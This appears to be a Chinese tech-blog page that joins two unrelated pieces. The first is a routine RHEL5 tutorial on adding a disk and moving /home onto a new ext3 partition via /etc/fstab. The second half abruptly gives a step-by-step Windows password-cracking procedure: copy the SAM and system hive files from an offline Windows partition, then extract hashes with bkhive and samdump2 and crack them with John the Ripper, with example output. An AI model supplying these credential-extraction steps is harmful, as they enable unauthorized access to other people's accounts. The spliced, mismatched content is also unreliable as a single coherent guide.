参考步骤:
1、在虚拟机中添加一块SCSI磁盘
2、建立一个20G分区,用于普通用户的宿主文件夹
3、将新分区挂载到/home目录下
4、服务器每次开机自动挂载
详细如下:
1、关机后添加新磁盘,重新开机进入RHEL5系统。
2、分区格式化
1)使用fdisk命令对新硬盘进行分区,建立一个20gb的主分区(/dev/sdb1)。
2)执行partprobe更新分区表信息,使用mkfs命令将该分区格式化为ext3文件系统。
3、迁移/home目录
1)转移原有/home目录中的内容并做好备份
因为home里面没有数据所以会出现这样的错误这边我就自己建立一点文件到里面就可以了
2)修改/etc/fstab文件中的分区挂载设置。
命令: vi /etc/fstab 0不用 启动
设备名 挂载点 文件系统类型 挂载参数(rwro只读noexec禁用程序) 需否备份顺序
添加后保存退出: /dev/sdb1 /home ext3 defaults 0 0
3)按/etc/fstab文件中设置将新建的分区挂载到/home目录下
命令: mount /dev/sdb1
4)将 “1)“ 中的备份的用户数据复制到新挂载/home文件系统。
命令:mv /home_backup/* /home/
命令:rm -rf /home_backup/
这边最后一个命令删除备份文件就可以了 整个/home数据备份迁移就完成了 !
用linux启动,并挂载Windows的系统分区把c:windowssystem32config目录下的'SAM和system复制出来,也可以用WINPE,DOS引导盘,都可以的,只要把SAM和system复制出来就行
开始破解:
bkhive system keys ——生成keys文件
samdump2 SAM keys >hashes ——用SAM和keys生成hashes
john hashes ——跑hashes
现在没有在linux下,改天上图,下面我文字描述一下
mount -t ntfs /dev/hda1 /mnt/windows
mkdir /home/young001/sam
cp /mnt/windows/WINDOWSsystem32config/SAM /home/young001/sam
cp /mnt/windows/WINDOWSsystem32config/system /home/young001/sam
unount /mnt/windows
cd /home/young001/sam
bkhive system keys
samdump2 SAM keys >hashes
john hashes ——跑hashes
这样密码揪出来了
另外加上一些提示:
比如administrator密码是123456,那么他会在最底下这么显示
administrator:123456:500:e263f50a6a506be3d494d3d62b4dc666:::看起来有点像/etc/passwd的内容格式,如果当时没有看清楚密码就清屏了,或者后来忘记已经破解了的密码,可以通过下面命令查看
john-1.7.2/run/john -show hashes有的时候密码处有可能会显示几个问号,如下
administrator:456:500:e263f50a6a506be3d494d3d62b4dc666:::这个时候可以通过
john-1.7.2/run/john -show hashes看看密码是否完整。 如果还是不完整,那么可能密码没有完全破解完毕,可以加–restore 参数从原来基础上继续破解
john-1.7.2/run/john ——restore hashes
欢迎分享,转载请注明来源:内存溢出
评论列表(0条)